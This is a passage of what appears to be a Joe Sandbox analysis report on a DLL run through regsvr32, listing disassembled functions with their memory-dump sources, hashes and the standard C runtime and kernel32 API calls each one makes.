                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CompareErrorInfoLastString
                                                                    • String ID:
                                                                    • API String ID: 3723911898-0
                                                                    • Opcode ID: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                    • Instruction ID: ef75186bd06483ec9af1c4902341fb87d7e04f0952ab4a1935f6a401bdf17254
                                                                    • Opcode Fuzzy Hash: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                    • Instruction Fuzzy Hash: A9E1A222A08BC28BEB309F55B46A37D2791BB447DCF544675DA6D87BC4DE3CA948C700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$DecodeEncode$ConsoleCtrlErrorHandlerLast__doserrno_errno_lock
                                                                    • String ID:
                                                                    • API String ID: 3466867069-0
                                                                    • Opcode ID: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                    • Instruction ID: 4736afbea9a0a1315355fe154beda34358b5e897777b6e125e7355f879114ca4
                                                                    • Opcode Fuzzy Hash: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                    • Instruction Fuzzy Hash: FE719D21E0A70349FF799F19B4BF2792291AF41BC4F1826B5C67EC66E1DE2CE449C241
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$_lock$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 1575098132-0
                                                                    • Opcode ID: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                    • Instruction ID: 5d2e0c82f768a76f75a37fd2285a305311a42cf8bdadda652540f8fffb929acc
                                                                    • Opcode Fuzzy Hash: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                    • Instruction Fuzzy Hash: A9310011A1A74285FF78EEA2B47B3795255EF80BC4F0415B5DA2E87696CF2CE8488312
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$_errno$DecodeEnvironmentPointerVariable__wtomb_environ
                                                                    • String ID: @Ce
                                                                    • API String ID: 3451773520-1767366083
                                                                    • Opcode ID: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                    • Instruction ID: 0db099b39cdc1b24002f0d62155c3abe40385f7c6b92a7db0df3ae3b298965f8
                                                                    • Opcode Fuzzy Hash: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                    • Instruction Fuzzy Hash: 68A19025E09F4241EA20EF15B92A37A6295BF40BDCF1486B5DA7DC77C6DE3CA49D8300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$ErrorInfoLast
                                                                    • String ID:
                                                                    • API String ID: 189849726-0
                                                                    • Opcode ID: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                    • Instruction ID: 4d56471cac12c05240552a37f7f493e17082e650711b06ed37340f8a20c13ce6
                                                                    • Opcode Fuzzy Hash: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                    • Instruction Fuzzy Hash: 8FB1D032A0878186DB20CF25B4692ADB7A4FB48B84F844176EB6CC3B91DF7DD549C700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 1012874770-0
                                                                    • Opcode ID: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                    • Instruction ID: df4a72bf26357eb4724cac9544dd1c929b53ec7245539ba667693443015a8a83
                                                                    • Opcode Fuzzy Hash: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                    • Instruction Fuzzy Hash: 54411232A0978284FF75DF61F56A3B923A0AF84BC4F041071DA2D8B695CF2DE489C311
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE292
                                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE2B1
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE356
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE3B5
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE3F0
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE42C
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE46C
                                                                    • free.LIBCMT ref: 00007FF8CA9BE47A
                                                                    • free.LIBCMT ref: 00007FF8CA9BE49C
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$Infofree
                                                                    • String ID:
                                                                    • API String ID: 1638741495-0
                                                                    • Opcode ID: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                    • Instruction ID: 8efce60e655aabc01cac9a3d3d4e4601f18477e1bbb776e447e88ec73a9ba258
                                                                    • Opcode Fuzzy Hash: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                    • Instruction Fuzzy Hash: 2F612A32A087828AE7309F15B8691B976EAFF447E8F584675DA2D83BD4CF3CD4498300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                    • String ID:
                                                                    • API String ID: 2551688548-0
                                                                    • Opcode ID: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                    • Instruction ID: 2c84bbb3a5647ad55b7577755723f10b396fb3c74579581eac5a11752ebf8055
                                                                    • Opcode Fuzzy Hash: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                    • Instruction Fuzzy Hash: A1417F21A09B4280EB60DF15F86F27A6294FF487C8F4441B4DA6D83B96EF3CE44D8705
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CA9B9206), ref: 00007FF8CA9B8F94
                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CA9B9206), ref: 00007FF8CA9B8FA6
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CA9B9206), ref: 00007FF8CA9B9006
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CA9B9206), ref: 00007FF8CA9B90BC
                                                                    • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CA9B9206), ref: 00007FF8CA9B90D3
                                                                    • free.LIBCMT ref: 00007FF8CA9B90E4
                                                                    • GetStringTypeA.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CA9B9206), ref: 00007FF8CA9B9161
                                                                    • free.LIBCMT ref: 00007FF8CA9B9171
                                                                      • Part of subcall function 00007FF8CA9BE23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE292
                                                                      • Part of subcall function 00007FF8CA9BE23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE2B1
                                                                      • Part of subcall function 00007FF8CA9BE23C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE3B5
                                                                      • Part of subcall function 00007FF8CA9BE23C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE3F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3535580693-0
                                                                    • Opcode ID: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                    • Instruction ID: fca98ea44daedd322a0e41c85e4af4d76788141aedea51e75df010aca079b2f4
                                                                    • Opcode Fuzzy Hash: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                    • Instruction Fuzzy Hash: D661B432B1474286DB309FA1F4AA5786791FB44BE8B144275DA3D93BD4DF3CE8498340
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetStartupInfoA.KERNEL32 ref: 00007FF8CA9B377D
                                                                      • Part of subcall function 00007FF8CA9B3108: Sleep.KERNEL32(?,?,0000000A,00007FF8CA9B2DA3,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B314D
                                                                    • GetFileType.KERNEL32 ref: 00007FF8CA9B38FA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: FileInfoSleepStartupType
                                                                    • String ID: @
                                                                    • API String ID: 1527402494-2766056989
                                                                    • Opcode ID: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                    • Instruction ID: d8ac1b4134db76242c5a0b2928d456d3548a208c638824d17f610c64be2636ca
                                                                    • Opcode Fuzzy Hash: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                    • Instruction Fuzzy Hash: CB917C22A18B8285E720CF29B46E3293A95BB057B4F6547B5C67D876E0DF7CE849C301
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$_getptd
                                                                    • String ID: +$-$0$0
                                                                    • API String ID: 3432092939-699404926
                                                                    • Opcode ID: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                    • Instruction ID: 65debe22664c4fdeb38e08a27ece863edf79d84074ffaef8ff257a9574e2a88c
                                                                    • Opcode Fuzzy Hash: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                    • Instruction Fuzzy Hash: 7F71F262D1C78281FBB54E15B4BF37A2691EB547D4F2541B6CA7A862D0DE3CF8488307
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _FF_MSGBANNER.LIBCMT ref: 00007FF8CA9B6ADF
                                                                      • Part of subcall function 00007FF8CA9B6F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF8CA9B7194,?,?,?,?,00007FF8CA9B6C69,?,?,00000000,00007FF8CA9B30C0), ref: 00007FF8CA9B6FCF
                                                                      • Part of subcall function 00007FF8CA9B334C: ExitProcess.KERNEL32 ref: 00007FF8CA9B335B
                                                                      • Part of subcall function 00007FF8CA9B309C: Sleep.KERNEL32(?,?,00000000,00007FF8CA9B6B19,?,?,00000000,00007FF8CA9B6BC3,?,?,?,?,?,?,00000000,00007FF8CA9B2DC8), ref: 00007FF8CA9B30D2
                                                                    • _errno.LIBCMT ref: 00007FF8CA9B6B21
                                                                    • _lock.LIBCMT ref: 00007FF8CA9B6B35
                                                                    • free.LIBCMT ref: 00007FF8CA9B6B57
                                                                    • _errno.LIBCMT ref: 00007FF8CA9B6B5C
                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF8CA9B6BC3,?,?,?,?,?,?,00000000,00007FF8CA9B2DC8,?,?,?,00007FF8CA9B2DFF), ref: 00007FF8CA9B6B82
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfree
                                                                    • String ID:
                                                                    • API String ID: 1354249094-0
                                                                    • Opcode ID: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                    • Instruction ID: a8b23b4cf3d8841b104939052d7b0096187ed8879ba5c29b70b389dd482b88b5
                                                                    • Opcode Fuzzy Hash: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                    • Instruction Fuzzy Hash: D6215E20A1D71282F770AF11B86A3BA6264EF847C4F0451B5E66EC66C2CF3CF4488710
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B2D7A
                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B2D88
                                                                    • SetLastError.KERNEL32(?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B2DE0
                                                                      • Part of subcall function 00007FF8CA9B3108: Sleep.KERNEL32(?,?,0000000A,00007FF8CA9B2DA3,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B314D
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B2DB4
                                                                    • free.LIBCMT ref: 00007FF8CA9B2DD7
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00007FF8CA9B2DC8
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                    • String ID:
                                                                    • API String ID: 3106088686-0
                                                                    • Opcode ID: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                    • Instruction ID: d6e873756f187b410f3c7bf719c27dd47755018fb7af188ef42b8327794329c8
                                                                    • Opcode Fuzzy Hash: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                    • Instruction Fuzzy Hash: 05017520A09F4292FB24EF65B46E3782292FF887D4B1442B4C93D923D1EE3CE44DC212
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 1012874770-0
                                                                    • Opcode ID: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                    • Instruction ID: 9bd29c4a30ccc5768bfc314c5ad19dd604b2a015466ce055241fe6f161bcbc14
                                                                    • Opcode Fuzzy Hash: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                    • Instruction Fuzzy Hash: 3601AC12958A4291EF74DFE1F4BB1751361AF84784F4420B2E62EC7992CF5DF8988210
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                    • Instruction ID: 35f165ea4b38a58693d638e63056450bbe4db89a95884c334216b3b1097b8659
                                                                    • Opcode Fuzzy Hash: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                    • Instruction Fuzzy Hash: A0B1B032B19B458AEB30DF62F4565AA77A0FB85784F401531EA9D83B95DF3CD109C740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$Sleep_errno
                                                                    • String ID:
                                                                    • API String ID: 2081351063-0
                                                                    • Opcode ID: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                    • Instruction ID: f0a047196ad123c53fd15b09046efe8c4ce39a5ea5ace0b4bf3645c5523b503e
                                                                    • Opcode Fuzzy Hash: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                    • Instruction Fuzzy Hash: 35312F21A0974285EB659F16F8BA2BD66A1AF84FC4F448075DF2D87796DE3CF808C340
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DecodePointer.KERNEL32(?,?,?,00007FF8CA9B73E5,?,?,?,?,00007FF8CA9B34D2,?,?,?,00007FF8CA9B21CB), ref: 00007FF8CA9B72FD
                                                                    • DecodePointer.KERNEL32(?,?,?,00007FF8CA9B73E5,?,?,?,?,00007FF8CA9B34D2,?,?,?,00007FF8CA9B21CB), ref: 00007FF8CA9B730C
                                                                    • EncodePointer.KERNEL32(?,?,?,00007FF8CA9B73E5,?,?,?,?,00007FF8CA9B34D2,?,?,?,00007FF8CA9B21CB), ref: 00007FF8CA9B7389
                                                                      • Part of subcall function 00007FF8CA9B318C: realloc.LIBCMT ref: 00007FF8CA9B31B7
                                                                      • Part of subcall function 00007FF8CA9B318C: Sleep.KERNEL32(?,?,00000000,00007FF8CA9B7379,?,?,?,00007FF8CA9B73E5,?,?,?,?,00007FF8CA9B34D2), ref: 00007FF8CA9B31D3
                                                                    • EncodePointer.KERNEL32(?,?,?,00007FF8CA9B73E5,?,?,?,?,00007FF8CA9B34D2,?,?,?,00007FF8CA9B21CB), ref: 00007FF8CA9B7398
